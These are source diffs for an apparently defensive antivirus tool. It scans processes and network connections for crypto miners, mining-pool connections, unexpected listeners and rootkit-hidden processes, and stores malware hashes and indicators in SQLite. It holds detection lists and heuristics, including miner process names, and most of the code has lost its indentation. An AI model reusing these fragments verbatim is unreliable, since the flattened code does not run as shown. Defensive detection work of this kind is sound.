# Mining-pool domain (substring match on IP / hostname).
for domain in CRYPTO_POOL_DOMAINS:
if domain in remote_ip:
suspicious.append({
"local_addr": local_str,
"remote_addr": remote_str,
"pid": conn.pid,
"process": proc_info,
"status": conn.status,
"reason": f"Connection to known mining pool: {domain}",
"severity": "CRITICAL",
})
break
return suspicious
# ------------------------------------------------------------------
# Listening-port audit
# ------------------------------------------------------------------
@staticmethod
def check_listening_ports() -> List[Dict[str, Any]]:
"""Return listening sockets that are *not* in the expected-services list.
Unexpected listeners may indicate a backdoor or reverse shell.
"""
unexpected: List[Dict[str, Any]] = []
try:
connections = psutil.net_connections(kind="inet")
except psutil.AccessDenied:
logger.warning("Insufficient permissions to read network connections")
return unexpected
for conn in connections:
if conn.status != "LISTEN":
continue
port = conn.laddr.port if conn.laddr else None
if port is None:
continue
proc_name = ""
if conn.pid:
try:
proc_name = psutil.Process(conn.pid).name()
except (psutil.NoSuchProcess, psutil.AccessDenied):
proc_name = "?"
            expected_name = _EXPECTED_LISTENERS.get(port)
            if expected_name and expected_name in proc_name:
                continue  # known good
            # Skip the IANA dynamic/ephemeral port range (49152-65535).
            if port >= 49152:
                continue
            # Anything else — including a well-known port served by an
            # unexpected process — is worth reporting.
            unexpected.append({
                "port": port,
                "local_addr": f"{conn.laddr.ip}:{port}" if conn.laddr else f"?:{port}",
                "pid": conn.pid,
                "process_name": proc_name,
                "reason": f"Unexpected listening service on port {port}",
                "severity": "MEDIUM",
            })
return unexpected
# ------------------------------------------------------------------
# Process resolution
# ------------------------------------------------------------------
@staticmethod
def resolve_process_for_connection(conn: Any) -> Dict[str, Any]:
"""Return basic process info for a ``psutil`` connection object.
Returns
-------
dict
``pid``, ``name``, ``cmdline``, ``username``.
"""
info: Dict[str, Any] = {
"pid": conn.pid,
"name": "",
"cmdline": [],
"username": "",
}
if not conn.pid:
return info
try:
proc = psutil.Process(conn.pid)
info["name"] = proc.name()
info["cmdline"] = proc.cmdline()
info["username"] = proc.username()
except (psutil.NoSuchProcess, psutil.AccessDenied):
pass
return info
# ------------------------------------------------------------------
# DNS audit
# ------------------------------------------------------------------
@staticmethod
def check_dns_queries() -> List[Dict[str, Any]]:
"""Audit ``/etc/resolv.conf`` for suspicious DNS server entries.
Malware sometimes rewrites ``resolv.conf`` to redirect DNS through an
attacker-controlled resolver, enabling man-in-the-middle attacks or
DNS-based C2 communication.
"""
issues: List[Dict[str, Any]] = []
resolv_path = Path("/etc/resolv.conf")
if not resolv_path.exists():
return issues
try:
content = resolv_path.read_text()
except PermissionError:
logger.warning("Cannot read /etc/resolv.conf")
return issues
nameserver_re = re.compile(r"^\s*nameserver\s+(\S+)", re.MULTILINE)
for match in nameserver_re.finditer(content):
server = match.group(1)
if server in _SUSPICIOUS_DNS_SERVERS:
issues.append({
"server": server,
"file": str(resolv_path),
"reason": f"Potentially suspicious DNS server: {server}",
"severity": "MEDIUM",
})
            # Flag non-RFC1918 / non-loopback servers that look unusual.
            # Only 172.16.0.0/12 is private, so check the second octet.
            parts = server.split(".")
            in_172_private = (
                len(parts) == 4
                and parts[0] == "172"
                and parts[1].isdigit()
                and 16 <= int(parts[1]) <= 31
            )
            if not (
                server.startswith("127.")
                or server.startswith("10.")
                or server.startswith("192.168.")
                or in_172_private
                or server == "::1"
            ):
# External DNS — not inherently bad but worth logging if the
# admin didn't set it intentionally.
issues.append({
"server": server,
"file": str(resolv_path),
"reason": f"External DNS server configured: {server}",
"severity": "LOW",
})
return issues
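The nameserver extraction used by `check_dns_queries` can be run on sample content directly (same regex as above):

```python
import re

nameserver_re = re.compile(r"^\s*nameserver\s+(\S+)", re.MULTILINE)
sample = "# resolv.conf\nnameserver 127.0.0.53\nnameserver 198.54.117.10\n"
servers = nameserver_re.findall(sample)
print(servers)  # ['127.0.0.53', '198.54.117.10']
```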


@@ -0,0 +1,387 @@
"""Process scanner for AYN Antivirus.
Inspects running processes for known crypto-miners, anomalous CPU usage,
and hidden / stealth processes. Uses ``psutil`` for cross-platform process
enumeration and ``/proc`` on Linux for hidden-process detection.
"""
from __future__ import annotations
import logging
import os
import signal
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, List, Optional
import psutil
from ayn_antivirus.constants import (
CRYPTO_MINER_PROCESS_NAMES,
HIGH_CPU_THRESHOLD,
)
from ayn_antivirus.scanners.base import BaseScanner
logger = logging.getLogger(__name__)
class ProcessScanner(BaseScanner):
"""Scan running processes for malware, miners, and anomalies.
Parameters
----------
cpu_threshold:
CPU-usage percentage above which a process is flagged. Defaults to
:pydata:`constants.HIGH_CPU_THRESHOLD`.
"""
def __init__(self, cpu_threshold: float = HIGH_CPU_THRESHOLD) -> None:
self.cpu_threshold = cpu_threshold
# ------------------------------------------------------------------
# BaseScanner interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "process_scanner"
@property
def description(self) -> str:
return "Inspects running processes for miners and suspicious activity"
def scan(self, target: Any = None) -> Dict[str, Any]:
"""Run a full process scan.
*target* is ignored — all live processes are inspected.
Returns
-------
dict
``total``, ``suspicious``, ``high_cpu``, ``hidden``.
"""
all_procs = self.get_all_processes()
suspicious = self.find_suspicious_processes()
high_cpu = self.find_high_cpu_processes()
hidden = self.find_hidden_processes()
return {
"total": len(all_procs),
"suspicious": suspicious,
"high_cpu": high_cpu,
"hidden": hidden,
}
# ------------------------------------------------------------------
# Process enumeration
# ------------------------------------------------------------------
@staticmethod
def get_all_processes() -> List[Dict[str, Any]]:
"""Return a snapshot of every running process.
Each dict contains: ``pid``, ``name``, ``cmdline``, ``cpu_percent``,
``memory_percent``, ``username``, ``create_time``, ``connections``,
``open_files``.
"""
result: List[Dict[str, Any]] = []
attrs = [
"pid", "name", "cmdline", "cpu_percent",
"memory_percent", "username", "create_time",
]
for proc in psutil.process_iter(attrs):
try:
info = proc.info
# Connections and open files are expensive; fetch lazily.
try:
connections = [
{
"fd": c.fd,
"family": str(c.family),
"type": str(c.type),
"laddr": f"{c.laddr.ip}:{c.laddr.port}" if c.laddr else "",
"raddr": f"{c.raddr.ip}:{c.raddr.port}" if c.raddr else "",
"status": c.status,
}
for c in proc.net_connections()
]
except (psutil.AccessDenied, psutil.NoSuchProcess, OSError):
connections = []
try:
open_files = [f.path for f in proc.open_files()]
except (psutil.AccessDenied, psutil.NoSuchProcess, OSError):
open_files = []
create_time = info.get("create_time")
result.append({
"pid": info["pid"],
"name": info.get("name", ""),
"cmdline": info.get("cmdline") or [],
"cpu_percent": info.get("cpu_percent") or 0.0,
"memory_percent": info.get("memory_percent") or 0.0,
"username": info.get("username", "?"),
"create_time": (
datetime.utcfromtimestamp(create_time).isoformat()
if create_time
else None
),
"connections": connections,
"open_files": open_files,
})
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
continue
return result
# ------------------------------------------------------------------
# Suspicious-process detection
# ------------------------------------------------------------------
def find_suspicious_processes(self) -> List[Dict[str, Any]]:
"""Return processes whose name or command line matches a known miner.
Matches are case-insensitive against
:pydata:`constants.CRYPTO_MINER_PROCESS_NAMES`.
"""
suspicious: List[Dict[str, Any]] = []
for proc in psutil.process_iter(["pid", "name", "cmdline", "cpu_percent", "username"]):
try:
info = proc.info
pname = (info.get("name") or "").lower()
cmdline = " ".join(info.get("cmdline") or []).lower()
for miner in CRYPTO_MINER_PROCESS_NAMES:
if miner in pname or miner in cmdline:
suspicious.append({
"pid": info["pid"],
"name": info.get("name", ""),
"cmdline": info.get("cmdline") or [],
"cpu_percent": info.get("cpu_percent") or 0.0,
"username": info.get("username", "?"),
"matched_signature": miner,
"reason": f"Known miner process: {miner}",
"severity": "CRITICAL",
})
break # one match per process
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
continue
return suspicious
# ------------------------------------------------------------------
# High-CPU detection
# ------------------------------------------------------------------
def find_high_cpu_processes(
self,
threshold: Optional[float] = None,
) -> List[Dict[str, Any]]:
"""Return processes whose CPU usage exceeds *threshold* percent.
Parameters
----------
threshold:
Override the instance-level ``cpu_threshold``.
"""
limit = threshold if threshold is not None else self.cpu_threshold
        high: List[Dict[str, Any]] = []
        # psutil measures cpu_percent relative to the previous call; the first
        # snapshot after interpreter start may report 0.0 for every process.
for proc in psutil.process_iter(["pid", "name", "cmdline", "cpu_percent", "username"]):
try:
info = proc.info
cpu = info.get("cpu_percent") or 0.0
if cpu > limit:
high.append({
"pid": info["pid"],
"name": info.get("name", ""),
"cmdline": info.get("cmdline") or [],
"cpu_percent": cpu,
"username": info.get("username", "?"),
"reason": f"High CPU usage: {cpu:.1f}%",
"severity": "HIGH",
})
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
continue
return high
# ------------------------------------------------------------------
# Hidden-process detection (Linux only)
# ------------------------------------------------------------------
@staticmethod
def find_hidden_processes() -> List[Dict[str, Any]]:
"""Detect processes visible in ``/proc`` but hidden from ``psutil``.
On non-Linux systems this returns an empty list.
A mismatch may indicate a userland rootkit that hooks the process
listing syscalls.
"""
proc_dir = Path("/proc")
if not proc_dir.is_dir():
return [] # not Linux
# PIDs visible via /proc filesystem.
proc_pids: set[int] = set()
try:
for entry in proc_dir.iterdir():
if entry.name.isdigit():
proc_pids.add(int(entry.name))
except PermissionError:
logger.warning("Cannot enumerate /proc")
return []
# PIDs visible via psutil (which ultimately calls getdents / readdir).
psutil_pids = set(psutil.pids())
        hidden: List[Dict[str, Any]] = []
        # A process that exits between the two enumerations above will also
        # land here; treat a single hit as advisory rather than proof.
        for pid in proc_pids - psutil_pids:
# Read whatever we can from /proc/<pid>.
name = ""
cmdline = ""
try:
comm = proc_dir / str(pid) / "comm"
if comm.exists():
name = comm.read_text().strip()
except OSError:
pass
try:
cl = proc_dir / str(pid) / "cmdline"
if cl.exists():
cmdline = cl.read_bytes().replace(b"\x00", b" ").decode(errors="replace").strip()
except OSError:
pass
hidden.append({
"pid": pid,
"name": name,
"cmdline": cmdline,
"reason": "Process visible in /proc but hidden from psutil (possible rootkit)",
"severity": "CRITICAL",
})
return hidden
# ------------------------------------------------------------------
# Single-process detail
# ------------------------------------------------------------------
@staticmethod
def get_process_details(pid: int) -> Dict[str, Any]:
"""Return comprehensive information about a single process.
Raises
------
psutil.NoSuchProcess
If the PID does not exist.
psutil.AccessDenied
If the caller lacks permission to inspect the process.
"""
proc = psutil.Process(pid)
with proc.oneshot():
info: Dict[str, Any] = {
"pid": proc.pid,
"name": proc.name(),
"exe": "",
"cmdline": proc.cmdline(),
"status": proc.status(),
"username": "",
"cpu_percent": proc.cpu_percent(interval=0.1),
"memory_percent": proc.memory_percent(),
"memory_info": {},
"create_time": datetime.utcfromtimestamp(proc.create_time()).isoformat(),
"cwd": "",
"open_files": [],
"connections": [],
"threads": proc.num_threads(),
"nice": None,
"environ": {},
}
try:
info["exe"] = proc.exe()
except (psutil.AccessDenied, OSError):
pass
try:
info["username"] = proc.username()
except psutil.AccessDenied:
pass
try:
mem = proc.memory_info()
info["memory_info"] = {"rss": mem.rss, "vms": mem.vms}
except (psutil.AccessDenied, OSError):
pass
try:
info["cwd"] = proc.cwd()
except (psutil.AccessDenied, OSError):
pass
try:
info["open_files"] = [f.path for f in proc.open_files()]
except (psutil.AccessDenied, OSError):
pass
try:
info["connections"] = [
{
"laddr": f"{c.laddr.ip}:{c.laddr.port}" if c.laddr else "",
"raddr": f"{c.raddr.ip}:{c.raddr.port}" if c.raddr else "",
"status": c.status,
}
for c in proc.net_connections()
]
except (psutil.AccessDenied, OSError):
pass
try:
info["nice"] = proc.nice()
except (psutil.AccessDenied, OSError):
pass
try:
info["environ"] = dict(proc.environ())
except (psutil.AccessDenied, OSError):
pass
return info
# ------------------------------------------------------------------
# Process control
# ------------------------------------------------------------------
@staticmethod
def kill_process(pid: int) -> bool:
"""Send ``SIGKILL`` to the process with *pid*.
Returns ``True`` if the signal was delivered successfully, ``False``
otherwise (e.g. the process no longer exists or permission denied).
"""
try:
proc = psutil.Process(pid)
proc.kill() # SIGKILL
proc.wait(timeout=5)
logger.info("Killed process %d (%s)", pid, proc.name())
return True
except psutil.NoSuchProcess:
logger.warning("Process %d no longer exists", pid)
return False
except psutil.AccessDenied:
logger.error("Permission denied killing process %d", pid)
# Fall back to raw signal as a last resort.
try:
os.kill(pid, signal.SIGKILL)
logger.info("Killed process %d via os.kill", pid)
return True
except OSError as exc:
logger.error("os.kill(%d) failed: %s", pid, exc)
return False
except psutil.TimeoutExpired:
logger.warning("Process %d did not exit within timeout", pid)
return False
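The name/cmdline matching behind `find_suspicious_processes` reduces to a substring scan; a minimal sketch (the signature list here is illustrative — the real one is `ayn_antivirus.constants.CRYPTO_MINER_PROCESS_NAMES`):

```python
from typing import List, Optional

MINER_NAMES = ["xmrig", "minerd", "cpuminer"]  # illustrative subset

def match_miner(name: str, cmdline: List[str]) -> Optional[str]:
    # Case-insensitive substring match against process name and command line,
    # mirroring the loop in find_suspicious_processes.
    haystack = name.lower() + " " + " ".join(cmdline).lower()
    for miner in MINER_NAMES:
        if miner in haystack:
            return miner
    return None

print(match_miner("XMRig", ["./xmrig", "-o", "pool.example:3333"]))  # xmrig
print(match_miner("bash", ["-c", "ls"]))  # None
```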


@@ -0,0 +1,251 @@
"""SQLite-backed malware hash database for AYN Antivirus.
Stores SHA-256 / MD5 hashes of known threats with associated metadata
(threat name, type, severity, source feed) and provides efficient lookup,
bulk-insert, search, and export operations.
"""
from __future__ import annotations
import csv
import logging
import sqlite3
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, List, Optional, Sequence, Tuple
from ayn_antivirus.constants import DEFAULT_DB_PATH
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Schema
# ---------------------------------------------------------------------------
_SCHEMA = """
CREATE TABLE IF NOT EXISTS threats (
hash TEXT PRIMARY KEY,
threat_name TEXT NOT NULL,
threat_type TEXT NOT NULL DEFAULT 'MALWARE',
severity TEXT NOT NULL DEFAULT 'HIGH',
source TEXT NOT NULL DEFAULT '',
added_date TEXT NOT NULL DEFAULT (datetime('now')),
details TEXT NOT NULL DEFAULT ''
);
CREATE INDEX IF NOT EXISTS idx_threats_type ON threats(threat_type);
CREATE INDEX IF NOT EXISTS idx_threats_source ON threats(source);
CREATE INDEX IF NOT EXISTS idx_threats_name ON threats(threat_name);
CREATE TABLE IF NOT EXISTS meta (
key TEXT PRIMARY KEY,
value TEXT
);
"""
class HashDatabase:
"""Manage a local SQLite database of known-malicious file hashes.
Parameters
----------
db_path:
Path to the SQLite file. Created automatically (with parent dirs)
if it doesn't exist.
"""
def __init__(self, db_path: str | Path = DEFAULT_DB_PATH) -> None:
self.db_path = Path(db_path)
self._conn: Optional[sqlite3.Connection] = None
# ------------------------------------------------------------------
# Lifecycle
# ------------------------------------------------------------------
def initialize(self) -> None:
"""Open the database and create tables if necessary."""
self.db_path.parent.mkdir(parents=True, exist_ok=True)
self._conn = sqlite3.connect(str(self.db_path), check_same_thread=False)
self._conn.row_factory = sqlite3.Row
self._conn.execute("PRAGMA journal_mode=WAL")
self._conn.executescript(_SCHEMA)
self._conn.commit()
logger.info("HashDatabase opened: %s (%d hashes)", self.db_path, self.count())
def close(self) -> None:
"""Flush and close the database."""
if self._conn:
self._conn.close()
self._conn = None
@property
def conn(self) -> sqlite3.Connection:
if self._conn is None:
self.initialize()
assert self._conn is not None
return self._conn
# ------------------------------------------------------------------
# Single-record operations
# ------------------------------------------------------------------
def add_hash(
self,
hash_str: str,
threat_name: str,
threat_type: str = "MALWARE",
severity: str = "HIGH",
source: str = "",
details: str = "",
) -> None:
"""Insert or replace a single hash record."""
self.conn.execute(
"INSERT OR REPLACE INTO threats "
"(hash, threat_name, threat_type, severity, source, added_date, details) "
"VALUES (?, ?, ?, ?, ?, ?, ?)",
(
hash_str.lower(),
threat_name,
threat_type,
severity,
source,
datetime.utcnow().isoformat(),
details,
),
)
self.conn.commit()
def lookup(self, hash_str: str) -> Optional[Dict[str, Any]]:
"""Look up a hash and return its metadata, or ``None``."""
row = self.conn.execute(
"SELECT * FROM threats WHERE hash = ?", (hash_str.lower(),)
).fetchone()
if row is None:
return None
return dict(row)
def remove(self, hash_str: str) -> bool:
"""Delete a hash record. Returns ``True`` if a row was deleted."""
cur = self.conn.execute(
"DELETE FROM threats WHERE hash = ?", (hash_str.lower(),)
)
self.conn.commit()
return cur.rowcount > 0
# ------------------------------------------------------------------
# Bulk operations
# ------------------------------------------------------------------
def bulk_add(
self,
records: Sequence[Tuple[str, str, str, str, str, str]],
) -> int:
"""Efficiently insert new hashes in a single transaction.
Uses ``INSERT OR IGNORE`` so existing entries are preserved and
only genuinely new hashes are counted.
Parameters
----------
records:
Sequence of ``(hash, threat_name, threat_type, severity, source, details)``
tuples.
Returns
-------
int
Number of **new** rows actually inserted.
"""
if not records:
return 0
now = datetime.utcnow().isoformat()
rows = [
(h.lower(), name, ttype, sev, src, now, det)
for h, name, ttype, sev, src, det in records
]
before = self.count()
self.conn.executemany(
"INSERT OR IGNORE INTO threats "
"(hash, threat_name, threat_type, severity, source, added_date, details) "
"VALUES (?, ?, ?, ?, ?, ?, ?)",
rows,
)
self.conn.commit()
return self.count() - before
# ------------------------------------------------------------------
# Query helpers
# ------------------------------------------------------------------
def count(self) -> int:
"""Total number of hashes in the database."""
return self.conn.execute("SELECT COUNT(*) FROM threats").fetchone()[0]
def get_stats(self) -> Dict[str, Any]:
"""Return aggregate statistics about the database."""
c = self.conn
by_type = {
row[0]: row[1]
for row in c.execute(
"SELECT threat_type, COUNT(*) FROM threats GROUP BY threat_type"
).fetchall()
}
by_source = {
row[0]: row[1]
for row in c.execute(
"SELECT source, COUNT(*) FROM threats GROUP BY source"
).fetchall()
}
latest = c.execute(
"SELECT MAX(added_date) FROM threats"
).fetchone()[0]
return {
"total": self.count(),
"by_type": by_type,
"by_source": by_source,
"latest_update": latest,
}
def search(self, query: str) -> List[Dict[str, Any]]:
"""Search threat names with a SQL LIKE pattern.
Example: ``search("%Trojan%")``
"""
rows = self.conn.execute(
"SELECT * FROM threats WHERE threat_name LIKE ? ORDER BY added_date DESC LIMIT 500",
(query,),
).fetchall()
return [dict(r) for r in rows]
# ------------------------------------------------------------------
# Export
# ------------------------------------------------------------------
def export_hashes(self, filepath: str | Path) -> int:
"""Export all hashes to a CSV file. Returns the row count."""
filepath = Path(filepath)
filepath.parent.mkdir(parents=True, exist_ok=True)
rows = self.conn.execute(
"SELECT hash, threat_name, threat_type, severity, source, added_date, details "
"FROM threats ORDER BY added_date DESC"
).fetchall()
with open(filepath, "w", newline="") as fh:
writer = csv.writer(fh)
writer.writerow(["hash", "threat_name", "threat_type", "severity", "source", "added_date", "details"])
for row in rows:
writer.writerow(list(row))
return len(rows)
# ------------------------------------------------------------------
# Meta helpers (used by manager to track feed state)
# ------------------------------------------------------------------
def set_meta(self, key: str, value: str) -> None:
self.conn.execute(
"INSERT OR REPLACE INTO meta (key, value) VALUES (?, ?)", (key, value)
)
self.conn.commit()
def get_meta(self, key: str) -> Optional[str]:
row = self.conn.execute(
"SELECT value FROM meta WHERE key = ?", (key,)
).fetchone()
return row[0] if row else None
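The class relies on one contract throughout: hashes are lower-cased on both insert and lookup, so mixed-case input still matches. A standalone sketch of that pattern against an in-memory SQLite database (no package imports; names are illustrative):

```python
# Standalone sketch of the case-normalisation contract used by HashDatabase.
import sqlite3

def demo_hash_lookup() -> str:
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.execute(
        "CREATE TABLE threats (hash TEXT PRIMARY KEY, threat_name TEXT)"
    )
    # Insert with upper-case input, look up with mixed case: both sides
    # are normalised via .lower(), so the lookup still hits.
    conn.execute(
        "INSERT OR REPLACE INTO threats VALUES (?, ?)",
        ("ABCD1234".lower(), "EICAR.Test"),
    )
    row = conn.execute(
        "SELECT * FROM threats WHERE hash = ?", ("AbCd1234".lower(),)
    ).fetchone()
    return dict(row)["threat_name"]

if __name__ == "__main__":
    print(demo_hash_lookup())
```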


@@ -0,0 +1,259 @@
"""SQLite-backed Indicator of Compromise (IOC) database for AYN Antivirus.
Stores malicious IPs, domains, and URLs sourced from threat-intelligence
feeds so that the network scanner and detectors can perform real-time
lookups.
"""
from __future__ import annotations
import logging
import sqlite3
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, List, Optional, Sequence, Set, Tuple
from ayn_antivirus.constants import DEFAULT_DB_PATH
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Schema
# ---------------------------------------------------------------------------
_SCHEMA = """
CREATE TABLE IF NOT EXISTS ioc_ips (
ip TEXT PRIMARY KEY,
threat_name TEXT NOT NULL DEFAULT '',
type TEXT NOT NULL DEFAULT 'C2',
source TEXT NOT NULL DEFAULT '',
added_date TEXT NOT NULL DEFAULT (datetime('now'))
);
CREATE INDEX IF NOT EXISTS idx_ioc_ips_source ON ioc_ips(source);
CREATE TABLE IF NOT EXISTS ioc_domains (
domain TEXT PRIMARY KEY,
threat_name TEXT NOT NULL DEFAULT '',
type TEXT NOT NULL DEFAULT 'C2',
source TEXT NOT NULL DEFAULT '',
added_date TEXT NOT NULL DEFAULT (datetime('now'))
);
CREATE INDEX IF NOT EXISTS idx_ioc_domains_source ON ioc_domains(source);
CREATE TABLE IF NOT EXISTS ioc_urls (
url TEXT PRIMARY KEY,
threat_name TEXT NOT NULL DEFAULT '',
type TEXT NOT NULL DEFAULT 'malware_distribution',
source TEXT NOT NULL DEFAULT '',
added_date TEXT NOT NULL DEFAULT (datetime('now'))
);
CREATE INDEX IF NOT EXISTS idx_ioc_urls_source ON ioc_urls(source);
"""
class IOCDatabase:
"""Manage a local SQLite store of Indicators of Compromise.
Parameters
----------
db_path:
Path to the SQLite file. Shares the same file as
:class:`HashDatabase` by default; each uses its own tables.
"""
_VALID_TABLES: frozenset = frozenset({"ioc_ips", "ioc_domains", "ioc_urls"})
def __init__(self, db_path: str | Path = DEFAULT_DB_PATH) -> None:
self.db_path = Path(db_path)
self._conn: Optional[sqlite3.Connection] = None
# ------------------------------------------------------------------
# Lifecycle
# ------------------------------------------------------------------
def initialize(self) -> None:
self.db_path.parent.mkdir(parents=True, exist_ok=True)
self._conn = sqlite3.connect(str(self.db_path), check_same_thread=False)
self._conn.row_factory = sqlite3.Row
self._conn.execute("PRAGMA journal_mode=WAL")
self._conn.executescript(_SCHEMA)
self._conn.commit()
logger.info(
"IOCDatabase opened: %s (IPs=%d, domains=%d, URLs=%d)",
self.db_path,
self._count("ioc_ips"),
self._count("ioc_domains"),
self._count("ioc_urls"),
)
def close(self) -> None:
if self._conn:
self._conn.close()
self._conn = None
@property
def conn(self) -> sqlite3.Connection:
if self._conn is None:
self.initialize()
assert self._conn is not None
return self._conn
def _count(self, table: str) -> int:
if table not in self._VALID_TABLES:
raise ValueError(f"Invalid table name: {table}")
return self.conn.execute(f"SELECT COUNT(*) FROM {table}").fetchone()[0]
# ------------------------------------------------------------------
# IPs
# ------------------------------------------------------------------
def add_ip(
self,
ip: str,
threat_name: str = "",
type: str = "C2",
source: str = "",
) -> None:
self.conn.execute(
"INSERT OR REPLACE INTO ioc_ips (ip, threat_name, type, source, added_date) "
"VALUES (?, ?, ?, ?, ?)",
(ip, threat_name, type, source, datetime.utcnow().isoformat()),
)
self.conn.commit()
def bulk_add_ips(
self,
records: Sequence[Tuple[str, str, str, str]],
) -> int:
"""Bulk-insert IPs. Each tuple: ``(ip, threat_name, type, source)``.
Returns the number of **new** rows actually inserted.
"""
if not records:
return 0
now = datetime.utcnow().isoformat()
rows = [(ip, tn, t, src, now) for ip, tn, t, src in records]
before = self._count("ioc_ips")
self.conn.executemany(
"INSERT OR IGNORE INTO ioc_ips (ip, threat_name, type, source, added_date) "
"VALUES (?, ?, ?, ?, ?)",
rows,
)
self.conn.commit()
return self._count("ioc_ips") - before
def lookup_ip(self, ip: str) -> Optional[Dict[str, Any]]:
row = self.conn.execute(
"SELECT * FROM ioc_ips WHERE ip = ?", (ip,)
).fetchone()
return dict(row) if row else None
def get_all_malicious_ips(self) -> Set[str]:
"""Return every stored malicious IP as a set for fast membership tests."""
rows = self.conn.execute("SELECT ip FROM ioc_ips").fetchall()
return {row[0] for row in rows}
# ------------------------------------------------------------------
# Domains
# ------------------------------------------------------------------
def add_domain(
self,
domain: str,
threat_name: str = "",
type: str = "C2",
source: str = "",
) -> None:
self.conn.execute(
"INSERT OR REPLACE INTO ioc_domains (domain, threat_name, type, source, added_date) "
"VALUES (?, ?, ?, ?, ?)",
(domain.lower(), threat_name, type, source, datetime.utcnow().isoformat()),
)
self.conn.commit()
def bulk_add_domains(
self,
records: Sequence[Tuple[str, str, str, str]],
) -> int:
"""Bulk-insert domains. Each tuple: ``(domain, threat_name, type, source)``.
Returns the number of **new** rows actually inserted.
"""
if not records:
return 0
now = datetime.utcnow().isoformat()
rows = [(d.lower(), tn, t, src, now) for d, tn, t, src in records]
before = self._count("ioc_domains")
self.conn.executemany(
"INSERT OR IGNORE INTO ioc_domains (domain, threat_name, type, source, added_date) "
"VALUES (?, ?, ?, ?, ?)",
rows,
)
self.conn.commit()
return self._count("ioc_domains") - before
def lookup_domain(self, domain: str) -> Optional[Dict[str, Any]]:
row = self.conn.execute(
"SELECT * FROM ioc_domains WHERE domain = ?", (domain.lower(),)
).fetchone()
return dict(row) if row else None
def get_all_malicious_domains(self) -> Set[str]:
"""Return every stored malicious domain as a set."""
rows = self.conn.execute("SELECT domain FROM ioc_domains").fetchall()
return {row[0] for row in rows}
# ------------------------------------------------------------------
# URLs
# ------------------------------------------------------------------
def add_url(
self,
url: str,
threat_name: str = "",
type: str = "malware_distribution",
source: str = "",
) -> None:
self.conn.execute(
"INSERT OR REPLACE INTO ioc_urls (url, threat_name, type, source, added_date) "
"VALUES (?, ?, ?, ?, ?)",
(url, threat_name, type, source, datetime.utcnow().isoformat()),
)
self.conn.commit()
def bulk_add_urls(
self,
records: Sequence[Tuple[str, str, str, str]],
) -> int:
"""Bulk-insert URLs. Each tuple: ``(url, threat_name, type, source)``.
Returns the number of **new** rows actually inserted.
"""
if not records:
return 0
now = datetime.utcnow().isoformat()
rows = [(u, tn, t, src, now) for u, tn, t, src in records]
before = self._count("ioc_urls")
self.conn.executemany(
"INSERT OR IGNORE INTO ioc_urls (url, threat_name, type, source, added_date) "
"VALUES (?, ?, ?, ?, ?)",
rows,
)
self.conn.commit()
return self._count("ioc_urls") - before
def lookup_url(self, url: str) -> Optional[Dict[str, Any]]:
row = self.conn.execute(
"SELECT * FROM ioc_urls WHERE url = ?", (url,)
).fetchone()
return dict(row) if row else None
# ------------------------------------------------------------------
# Aggregate stats
# ------------------------------------------------------------------
def get_stats(self) -> Dict[str, Any]:
return {
"ips": self._count("ioc_ips"),
"domains": self._count("ioc_domains"),
"urls": self._count("ioc_urls"),
}
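The `get_all_malicious_*` methods exist to support one access pattern: load every IOC into a Python set once, then do O(1) membership tests in a scanner's hot loop instead of per-packet SQL queries. A standalone sketch (illustrative names, in-memory DB):

```python
# Sketch of the set-membership fast path enabled by get_all_malicious_ips().
import sqlite3

def demo_ip_membership() -> bool:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ioc_ips (ip TEXT PRIMARY KEY)")
    conn.executemany(
        "INSERT OR IGNORE INTO ioc_ips (ip) VALUES (?)",
        [("203.0.113.7",), ("198.51.100.9",)],
    )
    # One query up front, then constant-time lookups.
    malicious = {row[0] for row in conn.execute("SELECT ip FROM ioc_ips")}
    return "203.0.113.7" in malicious and "192.0.2.1" not in malicious
```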


@@ -0,0 +1,92 @@
"""Abstract base class for AYN threat-intelligence feeds."""
from __future__ import annotations
import logging
import time
from abc import ABC, abstractmethod
from datetime import datetime
from typing import Any, Dict, List, Optional
logger = logging.getLogger(__name__)
class BaseFeed(ABC):
"""Common interface for all external threat-intelligence feeds.
Provides rate-limiting, last-updated tracking, and a uniform
``fetch()`` contract so the :class:`SignatureManager` can orchestrate
updates without knowing feed internals.
Parameters
----------
rate_limit_seconds:
Minimum interval between successive HTTP requests to the same feed.
"""
def __init__(self, rate_limit_seconds: float = 2.0) -> None:
self._rate_limit = rate_limit_seconds
self._last_request_time: float = 0.0
self._last_updated: Optional[datetime] = None
# ------------------------------------------------------------------
# Identity
# ------------------------------------------------------------------
@abstractmethod
def get_name(self) -> str:
"""Return a short, human-readable feed name."""
...
# ------------------------------------------------------------------
# Fetching
# ------------------------------------------------------------------
@abstractmethod
def fetch(self) -> List[Dict[str, Any]]:
"""Download the latest entries from the feed.
Returns a list of dicts. The exact keys depend on the feed type
(hashes, IOCs, rules, etc.). The :class:`SignatureManager` is
responsible for routing each entry to the correct database.
"""
...
# ------------------------------------------------------------------
# State
# ------------------------------------------------------------------
@property
def last_updated(self) -> Optional[datetime]:
"""Timestamp of the most recent successful fetch."""
return self._last_updated
def _mark_updated(self) -> None:
"""Record the current time as the last-successful-fetch timestamp."""
self._last_updated = datetime.utcnow()
# ------------------------------------------------------------------
# Rate limiting
# ------------------------------------------------------------------
def _rate_limit_wait(self) -> None:
"""Block until the rate-limit window has elapsed."""
elapsed = time.monotonic() - self._last_request_time
remaining = self._rate_limit - elapsed
if remaining > 0:
logger.debug("[%s] Rate-limiting: sleeping %.1fs", self.get_name(), remaining)
time.sleep(remaining)
self._last_request_time = time.monotonic()
# ------------------------------------------------------------------
# Logging helpers
# ------------------------------------------------------------------
def _log(self, msg: str, *args: Any) -> None:
logger.info("[%s] " + msg, self.get_name(), *args)
def _warn(self, msg: str, *args: Any) -> None:
logger.warning("[%s] " + msg, self.get_name(), *args)
def _error(self, msg: str, *args: Any) -> None:
logger.error("[%s] " + msg, self.get_name(), *args)
